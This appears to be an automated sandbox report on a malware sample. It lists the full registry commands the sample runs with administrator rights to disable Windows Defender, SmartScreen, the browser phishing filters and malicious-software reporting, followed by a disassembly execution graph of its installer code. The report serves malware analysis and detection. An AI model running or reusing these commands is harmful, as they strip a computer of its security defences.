                                                Target ID:19
                                                Start time:03:53:14
                                                Start date:12/07/2024
                                                Path:C:\Windows\SysWOW64\reg.exe
                                                Wow64 process (32bit):true
                                                Commandline:reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /f
                                                Imagebase:0x4b0000
                                                File size:59'392 bytes
                                                MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:20
                                                Start time:03:53:14
                                                Start date:12/07/2024
                                                Path:C:\Windows\SysWOW64\reg.exe
                                                Wow64 process (32bit):true
                                                Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /f
                                                Imagebase:0x4b0000
                                                File size:59'392 bytes
                                                MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:21
                                                Start time:03:53:14
                                                Start date:12/07/2024
                                                Path:C:\Windows\SysWOW64\reg.exe
                                                Wow64 process (32bit):true
                                                Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /f
                                                Imagebase:0x4b0000
                                                File size:59'392 bytes
                                                MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:22
                                                Start time:03:53:15
                                                Start date:12/07/2024
                                                Path:C:\Windows\SysWOW64\reg.exe
                                                Wow64 process (32bit):true
                                                Commandline:reg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg_DWORD /d 0 /f
                                                Imagebase:0x4b0000
                                                File size:59'392 bytes
                                                MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:23
                                                Start time:03:53:15
                                                Start date:12/07/2024
                                                Path:C:\Windows\SysWOW64\reg.exe
                                                Wow64 process (32bit):true
                                                Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /f
                                                Imagebase:0x4b0000
                                                File size:59'392 bytes
                                                MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:24
                                                Start time:03:53:15
                                                Start date:12/07/2024
                                                Path:C:\Windows\SysWOW64\reg.exe
                                                Wow64 process (32bit):true
                                                Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f
                                                Imagebase:0x4b0000
                                                File size:59'392 bytes
                                                MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:25
                                                Start time:03:53:15
                                                Start date:12/07/2024
                                                Path:C:\Windows\SysWOW64\reg.exe
                                                Wow64 process (32bit):true
                                                Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f
                                                Imagebase:0x4b0000
                                                File size:59'392 bytes
                                                MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:26
                                                Start time:03:53:15
                                                Start date:12/07/2024
                                                Path:C:\Windows\SysWOW64\reg.exe
                                                Wow64 process (32bit):true
                                                Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f
                                                Imagebase:0x7ff66e660000
                                                File size:59'392 bytes
                                                MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:27
                                                Start time:03:53:15
                                                Start date:12/07/2024
                                                Path:C:\Windows\SysWOW64\reg.exe
                                                Wow64 process (32bit):true
                                                Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f
                                                Imagebase:0x4b0000
                                                File size:59'392 bytes
                                                MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:28
                                                Start time:03:53:15
                                                Start date:12/07/2024
                                                Path:C:\Windows\SysWOW64\reg.exe
                                                Wow64 process (32bit):true
                                                Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f
                                                Imagebase:0x4b0000
                                                File size:59'392 bytes
                                                MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:29
                                                Start time:03:53:15
                                                Start date:12/07/2024
                                                Path:C:\Windows\SysWOW64\reg.exe
                                                Wow64 process (32bit):true
                                                Commandline:reg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /f
                                                Imagebase:0x4b0000
                                                File size:59'392 bytes
                                                MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:30
                                                Start time:03:53:15
                                                Start date:12/07/2024
                                                Path:C:\Windows\SysWOW64\reg.exe
                                                Wow64 process (32bit):true
                                                Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f
                                                Imagebase:0x4b0000
                                                File size:59'392 bytes
                                                MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:31
                                                Start time:03:53:15
                                                Start date:12/07/2024
                                                Path:C:\Windows\SysWOW64\reg.exe
                                                Wow64 process (32bit):true
                                                Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f
                                                Imagebase:0x4b0000
                                                File size:59'392 bytes
                                                MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:32
                                                Start time:03:53:16
                                                Start date:12/07/2024
                                                Path:C:\Windows\SysWOW64\reg.exe
                                                Wow64 process (32bit):true
                                                Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f
                                                Imagebase:0x4b0000
                                                File size:59'392 bytes
                                                MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:33
                                                Start time:03:53:16
                                                Start date:12/07/2024
                                                Path:C:\Windows\SysWOW64\reg.exe
                                                Wow64 process (32bit):true
                                                Commandline:reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f
                                                Imagebase:0x4b0000
                                                File size:59'392 bytes
                                                MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:34
                                                Start time:03:53:16
                                                Start date:12/07/2024
                                                Path:C:\Windows\SysWOW64\reg.exe
                                                Wow64 process (32bit):true
                                                Commandline:reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f
                                                Imagebase:0x4b0000
                                                File size:59'392 bytes
                                                MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:35
                                                Start time:03:53:16
                                                Start date:12/07/2024
                                                Path:C:\Windows\SysWOW64\reg.exe
                                                Wow64 process (32bit):true
                                                Commandline:reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /f
                                                Imagebase:0x4b0000
                                                File size:59'392 bytes
                                                MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:36
                                                Start time:03:53:16
                                                Start date:12/07/2024
                                                Path:C:\Windows\SysWOW64\reg.exe
                                                Wow64 process (32bit):true
                                                Commandline:reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /f
                                                Imagebase:0x4b0000
                                                File size:59'392 bytes
                                                MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:37
                                                Start time:03:53:16
                                                Start date:12/07/2024
                                                Path:C:\Windows\SysWOW64\reg.exe
                                                Wow64 process (32bit):true
                                                Commandline:reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AccountProtection_MicrosoftAccount_Disconnected" /t REG_DWORD /d 1 /f
                                                Imagebase:0x4b0000
                                                File size:59'392 bytes
                                                MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:38
                                                Start time:03:53:16
                                                Start date:12/07/2024
                                                Path:C:\Windows\SysWOW64\reg.exe
                                                Wow64 process (32bit):true
                                                Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /f
                                                Imagebase:0x4b0000
                                                File size:59'392 bytes
                                                MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:39
                                                Start time:03:53:16
                                                Start date:12/07/2024
                                                Path:C:\Windows\SysWOW64\reg.exe
                                                Wow64 process (32bit):true
                                                Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /f
                                                Imagebase:0x4b0000
                                                File size:59'392 bytes
                                                MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:40
                                                Start time:03:53:16
                                                Start date:12/07/2024
                                                Path:C:\Windows\SysWOW64\reg.exe
                                                Wow64 process (32bit):true
                                                Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /f
                                                Imagebase:0x4b0000
                                                File size:59'392 bytes
                                                MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:41
                                                Start time:03:53:17
                                                Start date:12/07/2024
                                                Path:C:\Windows\SysWOW64\reg.exe
                                                Wow64 process (32bit):true
                                                Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /f
                                                Imagebase:0x4b0000
                                                File size:59'392 bytes
                                                MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:42
                                                Start time:03:53:17
                                                Start date:12/07/2024
                                                Path:C:\Windows\SysWOW64\reg.exe
                                                Wow64 process (32bit):true
                                                Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Mpuser" /v "MpEnablePus" /t reg_DWORD /d "0" /f
                                                Imagebase:0x4b0000
                                                File size:59'392 bytes
                                                MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:43
                                                Start time:03:53:17
                                                Start date:12/07/2024
                                                Path:C:\Windows\SysWOW64\reg.exe
                                                Wow64 process (32bit):true
                                                Commandline:reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /f
                                                Imagebase:0x4b0000
                                                File size:59'392 bytes
                                                MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Disassembly

                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:15%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:16.5%
                                                  Total number of Nodes:1356
                                                  Total number of Limit Nodes:23
                                                  execution_graph 3657 402643 3658 402672 3657->3658 3659 402657 3657->3659 3661 4026a2 3658->3661 3662 402677 3658->3662 3674 402d89 3659->3674 3663 402dab 21 API calls 3661->3663 3664 402dab 21 API calls 3662->3664 3665 4026a9 lstrlenW 3663->3665 3666 40267e 3664->3666 3670 40265e 3665->3670 3677 406556 WideCharToMultiByte 3666->3677 3668 402692 lstrlenA 3668->3670 3669 4026ec 3670->3669 3673 4026d6 3670->3673 3678 406105 SetFilePointer 3670->3678 3671 4060d6 WriteFile 3671->3669 3673->3669 3673->3671 3675 406571 21 API calls 3674->3675 3676 402d9e 3675->3676 3676->3670 3677->3668 3679 406121 3678->3679 3681 406139 3678->3681 3680 4060a7 ReadFile 3679->3680 3682 40612d 3680->3682 3681->3673 3682->3681 3683 406142 SetFilePointer 3682->3683 3684 40616a SetFilePointer 3682->3684 3683->3684 3685 40614d 3683->3685 3684->3681 3686 4060d6 WriteFile 3685->3686 3686->3681 3687 403bc4 3688 403bcf 3687->3688 3689 403bd3 3688->3689 3690 403bd6 GlobalAlloc 3688->3690 3690->3689 3224 401946 3225 401948 3224->3225 3226 402dab 21 API calls 3225->3226 3227 40194d 3226->3227 3230 405c40 3227->3230 3266 405f0b 3230->3266 3233 405c68 DeleteFileW 3235 401956 3233->3235 3234 405c7f 3236 405d9f 3234->3236 3280 406534 lstrcpynW 3234->3280 3236->3235 3243 406891 2 API calls 3236->3243 3238 405ca5 3239 405cb8 3238->3239 3240 405cab lstrcatW 3238->3240 3281 405e4f lstrlenW 3239->3281 3241 405cbe 3240->3241 3245 405cce lstrcatW 3241->3245 3246 405cd9 lstrlenW FindFirstFileW 3241->3246 3244 405dc4 3243->3244 3244->3235 3247 405e03 3 API calls 3244->3247 3245->3246 3246->3236 3264 405cfb 3246->3264 3248 405dce 3247->3248 3250 405bf8 5 API calls 3248->3250 3249 405d82 FindNextFileW 3253 405d98 FindClose 3249->3253 3249->3264 3252 405dda 3250->3252 3254 405df4 3252->3254 3255 405dde 3252->3255 3253->3236 3257 4055b9 28 API calls 3254->3257 3255->3235 3258 4055b9 28 API calls 3255->3258 3257->3235 3260 405deb 3258->3260 3259 405c40 64 API calls 3259->3264 3262 4062f4 40 API calls 3260->3262 3261 4055b9 28 API calls 3261->3249 3262->3235 3263 4055b9 28 API calls 3263->3264 3264->3249 3264->3259 3264->3261 3264->3263 3285 406534 lstrcpynW 3264->3285 3286 405bf8 3264->3286 3294 4062f4 MoveFileExW 3264->3294 3299 406534 lstrcpynW 3266->3299 3268 405f1c 3300 405eae CharNextW CharNextW 3268->3300 3271 405c60 3271->3233 3271->3234 3272 4067e2 5 API calls 3278 405f32 3272->3278 3273 405f63 lstrlenW 3274 405f6e 3273->3274 3273->3278 3276 405e03 3 API calls 3274->3276 3275 406891 2 API calls 3275->3278 3277 405f73 GetFileAttributesW 3276->3277 3277->3271 3278->3271 3278->3273 3278->3275 3279 405e4f 2 API calls 3278->3279 3279->3273 3280->3238 3282 405e5d 3281->3282 3283 405e63 CharPrevW 3282->3283 3284 405e6f 3282->3284 3283->3282 3283->3284 3284->3241 3285->3264 3287 405fff 2 API calls 3286->3287 3288 405c04 3287->3288 3289 405c13 RemoveDirectoryW 3288->3289 3290 405c1b DeleteFileW 3288->3290 3292 405c25 3288->3292 3291 405c21 3289->3291 3290->3291 3291->3292 3293 405c31 SetFileAttributesW 3291->3293 3292->3264 3293->3292 3295 406317 3294->3295 3296 406308 3294->3296 3295->3264 3306 40617a 3296->3306 3299->3268 3301 405ecb 3300->3301 3305 405edd 3300->3305 3302 405ed8 CharNextW 3301->3302 3301->3305 3303 405f01 3302->3303 3303->3271 3303->3272 3304 405e30 CharNextW 3304->3305 3305->3303 3305->3304 3307 4061d0 GetShortPathNameW 3306->3307 3308 4061aa 3306->3308 3310 4061e5 3307->3310 3311 4062ef 3307->3311 3333 406024 GetFileAttributesW CreateFileW 3308->3333 3310->3311 3313 4061ed wsprintfA 3310->3313 3311->3295 3312 4061b4 CloseHandle GetShortPathNameW 3312->3311 3314 4061c8 3312->3314 3315 406571 21 API calls 3313->3315 3314->3307 3314->3311 3316 406215 3315->3316 3334 406024 GetFileAttributesW CreateFileW 3316->3334 3318 406222 3318->3311 3319 406231 GetFileSize GlobalAlloc 3318->3319 3320 406253 3319->3320 3321 4062e8 CloseHandle 3319->3321 3322 4060a7 ReadFile 3320->3322 3321->3311 3323 40625b 3322->3323 3323->3321 3335 405f89 lstrlenA 3323->3335 3326 406272 lstrcpyA 3330 406294 3326->3330 3327 406286 3328 405f89 4 API calls 3327->3328 3328->3330 3329 4062cb SetFilePointer 3331 4060d6 WriteFile 3329->3331 3330->3329 3332 4062e1 GlobalFree 3331->3332 3332->3321 3333->3312 3334->3318 3336 405fca lstrlenA 3335->3336 3337 405fd2 3336->3337 3338 405fa3 lstrcmpiA 3336->3338 3337->3326 3337->3327 3338->3337 3339 405fc1 CharNextA 3338->3339 3339->3336 3340 4015c6 3341 402dab 21 API calls 3340->3341 3342 4015cd 3341->3342 3343 405eae 4 API calls 3342->3343 3356 4015d6 3343->3356 3344 401636 3346 401668 3344->3346 3347 40163b 3344->3347 3345 405e30 CharNextW 3345->3356 3350 401423 28 API calls 3346->3350 3365 401423 3347->3365 3355 401660 3350->3355 3354 40164f SetCurrentDirectoryW 3354->3355 3356->3344 3356->3345 3357 40161c GetFileAttributesW 3356->3357 3359 405aff 3356->3359 3362 405a88 CreateDirectoryW 3356->3362 3369 405ae2 CreateDirectoryW 3356->3369 3357->3356 3360 406928 5 API calls 3359->3360 3361 405b06 3360->3361 3361->3356 3363 405ad4 3362->3363 3364 405ad8 GetLastError 3362->3364 3363->3356 3364->3363 3366 4055b9 28 API calls 3365->3366 3367 401431 3366->3367 3368 406534 lstrcpynW 3367->3368 3368->3354 3370 405af2 3369->3370 3371 405af6 GetLastError 3369->3371 3370->3356 3371->3370 3691 401c48 3692 402d89 21 API calls 3691->3692 3693 401c4f 3692->3693 3694 402d89 21 API calls 3693->3694 3695 401c5c 3694->3695 3696 401c71 3695->3696 3697 402dab 21 API calls 3695->3697 3698 401c81 3696->3698 3699 402dab 21 API calls 3696->3699 3697->3696 3700 401cd8 3698->3700 3701 401c8c 3698->3701 3699->3698 3702 402dab 21 API calls 3700->3702 3703 402d89 21 API calls 3701->3703 3704 401cdd 3702->3704 3705 401c91 3703->3705 3706 402dab 21 API calls 3704->3706 3707 402d89 21 API calls 3705->3707 3708 401ce6 FindWindowExW 3706->3708 3709 401c9d 3707->3709 3712 401d08 3708->3712 3710 401cc8 SendMessageW 3709->3710 3711 401caa SendMessageTimeoutW 3709->3711 3710->3712 3711->3712 3713 4028c9 3714 4028cf 3713->3714 3715 4028d7 FindClose 3714->3715 3716 402c2f 3714->3716 3715->3716 3720 4016d1 3721 402dab 21 API calls 3720->3721 3722 4016d7 GetFullPathNameW 3721->3722 3723 4016f1 3722->3723 3729 401713 3722->3729 3725 406891 2 API calls 3723->3725 3723->3729 3724 401728 GetShortPathNameW 3726 402c2f 3724->3726 3727 401703 3725->3727 3727->3729 3730 406534 lstrcpynW 3727->3730 3729->3724 3729->3726 3730->3729 3731 401e53 GetDC 3732 402d89 21 API calls 3731->3732 3733 401e65 GetDeviceCaps MulDiv ReleaseDC 3732->3733 3734 402d89 21 API calls 3733->3734 3735 401e96 3734->3735 3736 406571 21 API calls 3735->3736 3737 401ed3 CreateFontIndirectW 3736->3737 3738 40263d 3737->3738 3739 402955 3740 402dab 21 API calls 3739->3740 3741 402961 3740->3741 3742 402977 3741->3742 3743 402dab 21 API calls 3741->3743 3744 405fff 2 API calls 3742->3744 3743->3742 3745 40297d 3744->3745 3767 406024 GetFileAttributesW CreateFileW 3745->3767 3747 40298a 3748 402a40 3747->3748 3749 4029a5 GlobalAlloc 3747->3749 3750 402a28 3747->3750 3751 402a47 DeleteFileW 3748->3751 3752 402a5a 3748->3752 3749->3750 3753 4029be 3749->3753 3754 4032b9 35 API calls 3750->3754 3751->3752 3768 4034c7 SetFilePointer 3753->3768 3756 402a35 CloseHandle 3754->3756 3756->3748 3757 4029c4 3758 4034b1 ReadFile 3757->3758 3759 4029cd GlobalAlloc 3758->3759 3760 402a11 3759->3760 3761 4029dd 3759->3761 3763 4060d6 WriteFile 3760->3763 3762 4032b9 35 API calls 3761->3762 3766 4029ea 3762->3766 3764 402a1d GlobalFree 3763->3764 3764->3750 3765 402a08 GlobalFree 3765->3760 3766->3765 3767->3747 3768->3757 3769 4014d7 3770 402d89 21 API calls 3769->3770 3771 4014dd Sleep 3770->3771 3773 402c2f 3771->3773 3774 40195b 3775 402dab 21 API calls 3774->3775 3776 401962 lstrlenW 3775->3776 3777 40263d 3776->3777 3387 4020dd 3388 4020ef 3387->3388 3398 4021a1 3387->3398 3389 402dab 21 API calls 3388->3389 3390 4020f6 3389->3390 3392 402dab 21 API calls 3390->3392 3391 401423 28 API calls 3393 4022fb 3391->3393 3394 4020ff 3392->3394 3395 402115 LoadLibraryExW 3394->3395 3396 402107 GetModuleHandleW 3394->3396 3397 402126 3395->3397 3395->3398 3396->3395 3396->3397 3407 406997 3397->3407 3398->3391 3401 402170 3403 4055b9 28 API calls 3401->3403 3402 402137 3404 401423 28 API calls 3402->3404 3405 402147 3402->3405 3403->3405 3404->3405 3405->3393 3406 402193 FreeLibrary 3405->3406 3406->3393 3412 406556 WideCharToMultiByte 3407->3412 3409 4069b4 3410 4069bb GetProcAddress 3409->3410 3411 402131 3409->3411 3410->3411 3411->3401 3411->3402 3412->3409 3778 40495d 3779 404993 3778->3779 3780 40496d 3778->3780 3788 40451a 3779->3788 3785 4044b3 3780->3785 3783 40497a SetDlgItemTextW 3783->3779 3786 406571 21 API calls 3785->3786 3787 4044be SetDlgItemTextW 3786->3787 3787->3783 3789 4045dd 3788->3789 3790 404532 GetWindowLongW 3788->3790 3790->3789 3791 404547 3790->3791 3791->3789 3792 404574 GetSysColor 3791->3792 3793 404577 3791->3793 3792->3793 3794 404587 SetBkMode 3793->3794 3795 40457d SetTextColor 3793->3795 3796 4045a5 3794->3796 3797 40459f GetSysColor 3794->3797 3795->3794 3798 4045ac SetBkColor 3796->3798 3799 4045b6 3796->3799 3797->3796 3798->3799 3799->3789 3800 4045d0 CreateBrushIndirect 3799->3800 3801 4045c9 DeleteObject 3799->3801 3800->3789 3801->3800 3802 402b5e 3803 402bb0 3802->3803 3805 402b65 3802->3805 3804 406928 5 API calls 3803->3804 3807 402bb7 3804->3807 3806 402bae 3805->3806 3808 402d89 21 API calls 3805->3808 3809 402dab 21 API calls 3807->3809 3810 402b73 3808->3810 3812 402bc0 3809->3812 3811 402d89 21 API calls 3810->3811 3815 402b7f 3811->3815 3812->3806 3813 402bc4 IIDFromString 3812->3813 3813->3806 3814 402bd3 3813->3814 3814->3806 3820 406534 lstrcpynW 3814->3820 3819 40647b wsprintfW 3815->3819 3817 402bf0 CoTaskMemFree 3817->3806 3819->3806 3820->3817 3821 402a60 3822 402d89 21 API calls 3821->3822 3823 402a66 3822->3823 3824 402933 3823->3824 3825 402aa9 3823->3825 3826 402a8d 3823->3826 3827 402ac3 3825->3827 3828 402ab3 3825->3828 3829 402a92 3826->3829 3834 402aa3 3826->3834 3831 406571 21 API calls 3827->3831 3830 402d89 21 API calls 3828->3830 3835 406534 lstrcpynW 3829->3835 3830->3834 3831->3834 3834->3824 3836 40647b wsprintfW 3834->3836 3835->3824 3836->3824 3119 401761 3125 402dab 3119->3125 3123 40176f 3124 406053 2 API calls 3123->3124 3124->3123 3126 402db7 3125->3126 3127 406571 21 API calls 3126->3127 3128 402dd8 3127->3128 3129 401768 3128->3129 3130 4067e2 5 API calls 3128->3130 3131 406053 3129->3131 3130->3129 3132 406060 GetTickCount GetTempFileNameW 3131->3132 3133 40609a 3132->3133 3134 406096 3132->3134 3133->3123 3134->3132 3134->3133 3837 401d62 3838 402d89 21 API calls 3837->3838 3839 401d73 SetWindowLongW 3838->3839 3840 402c2f 3839->3840 3841 4028e3 3842 4028eb 3841->3842 3843 4028ef FindNextFileW 3842->3843 3845 402901 3842->3845 3844 402948 3843->3844 3843->3845 3847 406534 lstrcpynW 3844->3847 3847->3845 3848 401568 3849 402ba9 3848->3849 3852 40647b wsprintfW 3849->3852 3851 402bae 3852->3851 3853 4045e9 lstrcpynW lstrlenW 3854 40196d 3855 402d89 21 API calls 3854->3855 3856 401974 3855->3856 3857 402d89 21 API calls 3856->3857 3858 401981 3857->3858 3859 402dab 21 API calls 3858->3859 3860 401998 lstrlenW 3859->3860 3861 4019a9 3860->3861 3862 4019ea 3861->3862 3866 406534 lstrcpynW 3861->3866 3864 4019da 3864->3862 3865 4019df lstrlenW 3864->3865 3865->3862 3866->3864 3867 40166f 3868 402dab 21 API calls 3867->3868 3869 401675 3868->3869 3870 406891 2 API calls 3869->3870 3871 40167b 3870->3871 3872 402af0 3873 402d89 21 API calls 3872->3873 3874 402af6 3873->3874 3875 406571 21 API calls 3874->3875 3876 402933 3874->3876 3875->3876 3877 4026f1 3878 402d89 21 API calls 3877->3878 3886 402700 3878->3886 3879 40274a ReadFile 3879->3886 3889 40283d 3879->3889 3880 4060a7 ReadFile 3880->3886 3881 406105 5 API calls 3881->3886 3882 40278a MultiByteToWideChar 3882->3886 3883 40283f 3890 40647b wsprintfW 3883->3890 3885 4027b0 SetFilePointer MultiByteToWideChar 3885->3886 3886->3879 3886->3880 3886->3881 3886->3882 3886->3883 3886->3885 3887 402850 3886->3887 3886->3889 3888 402871 SetFilePointer 3887->3888 3887->3889 3888->3889 3890->3889 3891 404672 3892 4047a4 3891->3892 3894 40468a 3891->3894 3893 40480e 3892->3893 3895 4048d8 3892->3895 3900 4047df GetDlgItem SendMessageW 3892->3900 3893->3895 3896 404818 GetDlgItem 3893->3896 3897 4044b3 22 API calls 3894->3897 3902 40451a 8 API calls 3895->3902 3898 404832 3896->3898 3899 404899 3896->3899 3901 4046f1 3897->3901 3898->3899 3907 404858 SendMessageW LoadCursorW SetCursor 3898->3907 3899->3895 3903 4048ab 3899->3903 3924 4044d5 EnableWindow 3900->3924 3905 4044b3 22 API calls 3901->3905 3906 4048d3 3902->3906 3908 4048c1 3903->3908 3909 4048b1 SendMessageW 3903->3909 3911 4046fe CheckDlgButton 3905->3911 3928 404921 3907->3928 3908->3906 3913 4048c7 SendMessageW 3908->3913 3909->3908 3910 404809 3925 4048fd 3910->3925 3922 4044d5 EnableWindow 3911->3922 3913->3906 3917 40471c GetDlgItem 3923 4044e8 SendMessageW 3917->3923 3919 404732 SendMessageW 3920 404758 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 3919->3920 3921 40474f GetSysColor 3919->3921 3920->3906 3921->3920 3922->3917 3923->3919 3924->3910 3926 404910 SendMessageW 3925->3926 3927 40490b 3925->3927 3926->3893 3927->3926 3931 405b5a ShellExecuteExW 3928->3931 3930 404887 LoadCursorW SetCursor 3930->3899 3931->3930 3135 401774 3136 402dab 21 API calls 3135->3136 3137 40177b 3136->3137 3138 4017a3 3137->3138 3139 40179b 3137->3139 3206 406534 lstrcpynW 3138->3206 3205 406534 lstrcpynW 3139->3205 3142 4017a1 3146 4067e2 5 API calls 3142->3146 3143 4017ae 3207 405e03 lstrlenW CharPrevW 3143->3207 3150 4017c0 3146->3150 3151 4017d2 CompareFileTime 3150->3151 3152 401892 3150->3152 3153 401869 3150->3153 3156 406534 lstrcpynW 3150->3156 3162 406571 21 API calls 3150->3162 3169 405b94 MessageBoxIndirectW 3150->3169 3173 406024 GetFileAttributesW CreateFileW 3150->3173 